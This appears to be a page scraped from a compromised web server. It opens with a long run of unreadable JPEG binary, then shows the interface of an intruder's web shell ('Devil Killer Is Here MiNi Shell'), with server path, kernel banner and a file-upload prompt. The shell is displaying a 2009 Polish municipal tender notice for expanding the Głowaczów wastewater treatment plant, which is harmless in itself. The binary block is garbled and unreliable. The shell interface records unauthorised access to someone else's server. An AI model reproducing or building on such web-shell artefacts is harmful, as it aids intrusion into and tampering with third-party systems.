JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090226/41710-N-2009.html

<p class="kh_header"><b>Głowaczów: ROZBUDOWA I PRZEBUDOWA OCZYSZCZALNI ŚCIEKÓW NA DZIAŁCE NR 815 POŁOŻONEJ W MIEJSCOWOŚCI GŁOWACZÓW, W GMINIE GŁOWACZÓW</b><br>
<b>Numer ogłoszenia: 41710 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Głowaczów , ul. Rynek 35, 26-903 Głowaczów, woj. mazowieckie, tel. 048 6231023, faks 048 6231217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glowaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA I PRZEBUDOWA OCZYSZCZALNI ŚCIEKÓW NA DZIAŁCE NR 815 POŁOŻONEJ W MIEJSCOWOŚCI GŁOWACZÓW, W GMINIE GŁOWACZÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie zadania inwestycyjnego pt. Rozbudowa i przebudowa i oczyszczalni ścieków na działce nr 815 położonej w  miejscowości Głowaczów, w gminie Głowaczów. 
2. Prace wykonywane będą na czynnym obiekcie bez zatrzymania jego eksploatacji.
3. Zakres planowanych do wykonania robót budowlanych: przebudowa i rozbudowa oczyszczalni ścieków w  Głowaczowie w celu zwiększenia przepustowości do Qd śr - 240 m3/d w technologii mechaniczno-biologicznego oczyszczania ścieków. 
4. W zakres  przedmiotu zamówienia wchodzi  wykonanie :
1). Przebudowa pompowni ścieków surowych - obiekt nowy, w tym:
- przenośnik pionowy z systemem separacji skratek,
- pompy ścieków,
- piaskownik wirowy  z pompą pulpy piaskowej,
- budynek seperatora piasku,
- stacja zlewcza ścieków dowożonych,
2). Przebudowa reaktora biologicznego, w tym:
- mieszadło mechaniczne,
- pompy zatapialne,
- tlenomierz,
- stacja dmuchaw - dmuchawy - 3 szt,
- ruszt napowietrzający.
3). Rozbudowa budynku gospodarki osadowej wraz z montażem nowych urządzeń technicznych i budową wiaty,
4). Budowa magazynu osadu odwodnionego,
5). Do zagospodarowania osadu Wykonawca dostarcza nowy sprzęt tj.: ciągnik rolniczy o mocy nie mniejszej niż 65 KM i napędzie 4x4, ogumienie - przód 11,2 R 24, tył 16,9 R30, kabina standardowa - ogrzewana, wyposażony w ładowacz czołowy o udźwigu min. 1,2 t z łyżką do materiałów sypkich o szerokości min. 2 m i pojemności min. 1 m3 oraz przyczepa rolnicza  - samowyładowcza, jednoosiowa o ładowności min. 3,5 t z trzystronnym wywrotem (tył, prawo, lewo) wysokość skrzyni min. 0,5 m i pojemności ładunkowej min. 3 m3,   
6). Rozbudowa układu sterowania procesem technologicznym oczyszczania ścieków,
7). Zamontowanie alarmów - do zabezpieczenia budynków,
8). Zagospodarowanie terenu:
- wykonanie nowych ciągów komunikacyjnych w okolicy nowo wybudowanych obiektów:
- drogi i chodniki z kostki brukowej,
- uzupełnienie niezbędnej zieleni wzdłuż ogrodzenia (Tuja occidentalis),
- uporządkowanie terenu budowy po zakończeniu robót z doprowadzeniem do należytego wyglądu,
9). Wykonanie inwentaryzacji geodezyjnej powykonawczej,
10). Szkolenie pracowników obsługi oczyszczalni oraz dostarczenie instrukcji obsługi
               poszczególnych urządzeń,
11). Uruchomienie oczyszczalni - rozruch technologiczny i uzyskanie projektowanych parametrów kreślonych w pozwoleniu wodnoprawnym tj.:BZT5= 25 mgO2/l, CHZT= 125 mg02/l, zawiesina ogólna - 35 mg/l wraz z przedłożeniem wyników badań ścieków przed końcowym terminem odbioru robót.
12). Udzielenia minimum 5 lat gwarancji jakości na wykonane robóty budowlane wraz materiałami budowlanymi i wyrobami budowlanymi, a na dostarczone urządzenia  i wyposażenie - okres gwarancji zgodny z gwarancją producenta. W przypadku, gdy producent udziela gwarancji na okres dłuższy, wówczas obowiązuje gwarancja producenta.
5. Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową tj. projektami budowlano-wykonawczymi i specyfikacją techniczną wykonania i odbioru robót. Szczegółowo z dokumentacją można się zapoznać przed złożeniem oferty. Dokumentacja jest dostępna w pokoju nr 12 lub 3 w siedzibie Zamawiającego.
          Do oferty należy załączyć kosztorys ofertowy uproszczony wraz z zestawieniem cen materiałów budowlanych i urządzeń, sporządzony na bazie załączonych - Przedmiarów robót oraz  sporządzić Harmonogram rzeczowo- finansowy wg załącznika nr 8  do SIWZ. 
6. Postanowienia dotyczące dokumentacji projektowej:
1). Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z dokumentacją projektową i zachowaniem wskazanej przez Projektanta technologii, zgodnie z zasadami wiedzy technicznej, normami, warunkami technicznego wykonania i odbioru robót, wskazaniami Zamawiającego oraz obowiązującymi przepisami.
2). Wykonawca ma obowiązek zapoznać się z dokumentacją projektową i złożyć na piśmie dostrzeżone błędy lub uchybienia, które mogą mieć wpływ na prawidłowe wykonanie przedmiotu zamówienia.
3). W przypadku wystąpienia okoliczności powodujących konieczność wprowadzenia zmian w dokumentacji projektowej Wykonawca ma obowiązek pisemnego powiadomienia Zamawiającego o tym fakcie w terminie do 3 dni od dnia wystąpienia w/w okoliczności.
4). Nie dopuszcza się możliwości złożenia oferty przewidującej odmienny sposób wykonania przedmiotu zamówienia niż określony w dokumentacji projektowej.
7. Postanowienia dotyczące wykonania przedmiotu umowy:
1). Roboty budowlane prowadzone będą podczas ciągłej pracy oczyszczalni ścieków. Przerwy technologiczne, np. spowodowane włączeniem nowych urządzeń, należy wcześniej zgłosić pisemnie do Zamawiającego i uzyskać na nie pisemną zgodę Inspektora Nadzoru  i Zamawiającego oraz należy określić dopuszczalny czas wyłączenia z pracy urządzeń oczyszczalni ścieków.  
2). Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej terenu, objętego przyszłymi robotami budowlanymi w ramach niniejszego przedmiotu zamówienia w celu zapoznania się z warunkami realizacji tych robót.
3). Przekazanie placu budowy - będzie następować w obecności Wykonawcy, Zamawiającego i Inspektora nadzoru w terminie uzgodnionym przez strony.
4). Wykonawca zobowiązany jest do pisemnego powiadomienia Zamawiającego o okolicznościach mogących mieć wpływ na niedotrzymanie terminu wykonania przedmiotu zamówienia w nieprzekraczalnym terminie do 7 dni od dnia wystąpienia w/w okoliczności.
5). Wszystkie napotkane przewody podziemne Wykonawca winien zabezpieczyć. W przypadku ich uszkodzenia należy niezwłocznie zawiadomić o tym fakcie Zamawiającego, Inspektora Nadzoru oraz inne zainteresowane podmioty oraz dokonać  naprawy uszkodzeń na własny koszt.
6).Prowadzone roboty budowlane muszą odbywać się zgodnie z przepisami prawa budowlanego, BHP,  ppoż., sanitarnymi i przepisami ochrony środowiska, pod nadzorem osób posiadających uprawnienia do prowadzenia robót.
7). Wszystkie materiały, urządzenia i wyposażenie użyte do wykonania przedmiotu zamówienia  muszą być nowe oraz muszą być dopuszczone do stosowania na terenie RP, a także muszą spełniać warunki określone w ustawie z dnia 07 lipca 1994r. Prawo budowlane (Dz. U. z 2003r., Nr 207, poz. 2016 ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury w sprawie sposobów deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym z 11 sierpnia 2004r. (Dz. U. z 2004r., Nr 198, poz. 2041).
8). Wykonawca ma obowiązek zorganizowania placu budowy, zabezpieczenia miejsca wykonywanych  robót oraz dbania o stan techniczny i prawidłowość oznakowania przez cały czas trwania realizacji zadania.
9). Wykonawca jest zobowiązany pokryć koszty (opłaty, kary) wynikłe z tytułu zanieczyszczenia środowiska w przypadku wystąpienia awarii będącej następstwem jego działania i prowadzonych przez niego robót budowlanych.
10). Wykonawca jest zobowiązany do zabezpieczenia terenu robót przed osobami postronnymi, a w szczególności do przeciwdziałania wypadkom osób trzecich. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom trzecim w wyniku prowadzonych prac, od dnia przekazania placu budowy.
11). Pełnego ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku ze zdarzeniami losowymi, odpowiedzialności cywilnej.
12).Wykonawca jest zobowiązany do uporządkowania placu budowy  przed terminem odbioru końcowego robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.51.27-4, 45.25.22.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w wysokości 30 000,00 zł, słownie: trzydzieści tysięcy złotych 00/100.
2.	 Wykonawca wnosi wadium:
- w pieniądzu - wpłata wniesiona przelewem na konto Zamawiającego - BS Głowaczów- 57 9125 0005 0000 0374 2000 0080,    
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że  poręczenie kasy jest  zawsze poręczeniem pieniężnym,
- w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych,
-w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
3. Uwaga: Wadium wnoszone w formie niepieniężnej musi zawierać zapis art. 46 ust. 4a   ustawy Pzp  
4.	Dokument gwarancji w formie nie pieniężnej - winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
5. Sposób przekazania wadium: wadium winno być wniesione przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego. Do oferty należy dołączyć kserokopię dokonania przelewu.
6.	 Gwarancję wnoszoną w innej formie niż pieniężna należy złożyć w formie oryginału w kasie Urzędu Gminy - pokój nr 3, a kserokopię dokumentu załączyć do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy zgodnie z art. 22 ust. 1 ustawy Pzp,  spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.	Opis warunków udziału w postępowaniu: 
2.1.	Na potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca  przedkłada:
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz  składek na ubezpieczenie zdrowotne i społeczne  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu - wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,
- Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.2.	Na potwierdzenie posiadania wiedzy i doświadczenia oraz dysponowania potencjałem technicznym Wykonawca  przedkłada:
- wykaz należycie wykonanych co najmniej dwóch robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. Należy wykazać co najmniej dwie roboty budowlane w zakresie budowy lub rozbudowy, przebudowy oczyszczalni ścieków o min. przepustowości Qd śr - 240 m3/d w  technologii mechaniczno-biologicznej i wartości powyżej 800.000,00 PLN,
- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca. Jeżeli w wykazie Wykonawca wskaże, że będzie dysponował narzędziami i urządzeniami innych podmiotów, wówczas należy złożyć pisemne zobowiązanie tych podmiotów do udostępnienia wskazanych narzędzi i urządzeń,  
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował.
Osoby wykazane w wykazie, które będą uczestniczyć w wykonaniu zamówienia, muszą posiadać wymagane uprawnienia.  Należy wykazać kierownika budowy oraz kierowników robót, którzy posiadają uprawnienia do kierowania i nadzorowania robót branży: ogólnobudowlanej, elektrycznej i sanitarnej.  
2.3.	Na potwierdzenie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  Wykonawca  przedkłada:
- informację banku lub kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert. Wykonawca winien wykazać, że posiada dostęp do linii kredytowej lub wolne środki w wysokości nie mniejszej niż 800.000,00 PLN.
2.4.	Na potwierdzenie, że nie podlega wykluczeniu Wykonawca składa oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
2.5. Na potwierdzenie spełnienia wszystkich wymaganych warunków, Wykonawca składa oświadczenie z art. 22 ust. 1 pkt 1- 4 ustawy Pzp.(Uwaga: w pkt. 2 należy dokonać odpowiedniego zaznaczenia. W przypadku nie  dysponowania potencjałem technicznym lub osobami zdolnymi do wykonania zamówienia należy złożyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia).
5.3. 	Ocena spełniania warunków zostanie dokonana zgodnie z formułą: spełnia/nie spełnia, na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę w ofercie, których załączenie jest wymagane przez Zamawiającego zgodnie z pkt 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu,  musi wraz z ofertą złożyć następujące dokumenty, oświadczenia, zaświadczenia i informacje: 
1.1.	Wypełniony formularz Zamawiającego - Oferta Przetargowa- zał. 1 SIWZ,
1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji - wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,
1.4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji - wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,
1.5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.7.	Wykaz należycie wykonanych co najmniej dwóch robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie. Należy wykazać co najmniej dwie roboty budowlane w zakresie budowy lub rozbudowy, przebudowy oczyszczalni ścieków o min. przepustowości  Qd śr - 240 m3/d w  technologii mechaniczno-biologicznej i wartości powyżej 800.000,00 PLN oraz załączyć referencje lub inne dokumenty potwierdzające, że roboty zostały wykonane z należytą starannością - zał. nr 4 SIWZ.
1.8.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca. Jeżeli w wykazie Wykonawca wskaże, że będzie dysponował narzędziami i urządzeniami innych podmiotów, wówczas należy złożyć pisemne zobowiązanie tych podmiotów do udostępnienia wskazanych narzędzi i urządzeń - załącznik nr 6 SIWZ, 
1.9.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. nr 5 SIWZ. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował. Osoby wykazane w wykazie, które będą uczestniczyć w wykonaniu zamówienia, muszą posiadać wymagane prawem uprawnienia oraz muszą być wpisani na listę członków właściwej izby samorządu zawodowego i posiadać aktualne ubezpieczenie OC. Należy wykazać kierownika budowy oraz kierowników robót, którzy posiadają uprawnienia do kierowania i nadzorowania robót branży: ogólnobudowlanej, elektrycznej i sanitarnej. Osoby wskazane na kierowników robót winny posiadać:
- kierownik robót ogólnobudowlanych - posiada uprawnienia do kierowania robotami w specjalności konstrukcyjno-budowlanej oraz jest wpisany na listę członków samorządu zawodowego, posiada aktualne ubezpieczenie OC,
- kierownik robót sanitarnych - posiada uprawnienia do kierowania robotami w specjalności instalacyjno - inżynieryjnej w zakresie sieci, instalacji i urządzeń sanitarnych oraz jest wpisany na listę członków samorządu zawodowego, posiada aktualne ubezpieczenie OC,
- kierownik robót elektrycznych - posiada uprawnienia do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz jest wpisany na listę członków samorządu zawodowego, posiada aktualne ubezpieczenie OC.
1.10.	Informacja banku lub kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert. Wykonawca winien wykazać, że posiada dostęp do linii kredytowej lub wolne środki w wysokości nie mniejszej niż 800.000,00 PLN.
1.11.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1 - 4 ustawy Pzp- zał. nr 2 SIWZ. .(Uwaga: w pkt. 2 należy dokonać odpowiedniego zaznaczenia. W przypadku nie  dysponowania potencjałem technicznym lub osobami zdolnymi do wykonania zamówienia należy złożyć pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia).
1.12.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp - zał. nr 3 SIWZ.
1.13.	Kosztorys ofertowy uproszczony wraz z załączoną wyceną materiałów budowlanych, urządzeń i wyposażenia - wypełniony przedmiar robót, który ma jedynie charakter pomocniczy przy sprawdzaniu ceny oferty.
1.14.	Harmonogram rzeczowo-finansowy wykonania zamówienia sporządzony na bazie kosztorysu ofertowego, który będzie służył do płatności faktur częściowych - zał. nr 8 SIWZ.
1.15.	 Informacja o zakresach robót zleconych -Podwykonawcom, w przypadku nie korzystania z podwykonawców należy wpisać -NIE DOTYCZY - zał. nr 7 SIWZ .
6.1.16.	Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.
1.17.	Parafowany wzór umowy - zgodnie z pkt 16 SIWZ - zał. nr 9 SIWZ.
1.18.	Wniesienie wadium. Kopia dokumentu potwierdzającego wniesienie wadium powinna być dołączona do oferty. Wadium wnoszone w formie nie pieniężnej musi zawierać zapis dotyczący art. 46 ust. 4 a ustawy Pzp.
   
2. 	Oferta przedstawiona przez dwa lub więcej podmiotów występujących wspólnie -(art. 23 ustawy Pzp), będzie musiała spełnić następujące wymagania:
2.1. Jeden z partnerów konsorcjum zostanie ustanowiony jako lider - pełnomocnik, upoważniony do reprezentowania wszystkich uczestników konsorcjum w postępowaniu i zawarciu umowy,
2.2. Dokumenty i informacje wymienione w punkcie 1.2; 1.3.; 1.4; 1.5; 1.6; 1.11;   1.12; 1.16 składa każdy partner konsorcjum, natomiast pozostałe dokumenty dotyczące przedmiotu zamówienia muszą być złożone jako wspólne, a dotyczą punktów: 1.1; 1.7; 1.8; 1.9; 1.10; 1.13; 1.14;  1.15; 1.17: 1.18.     
2.3. 	Oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów.
2.4.	Przed podpisaniem umowy Zamawiający żąda przedłożenia umowy regulującej współpracę Wykonawców.
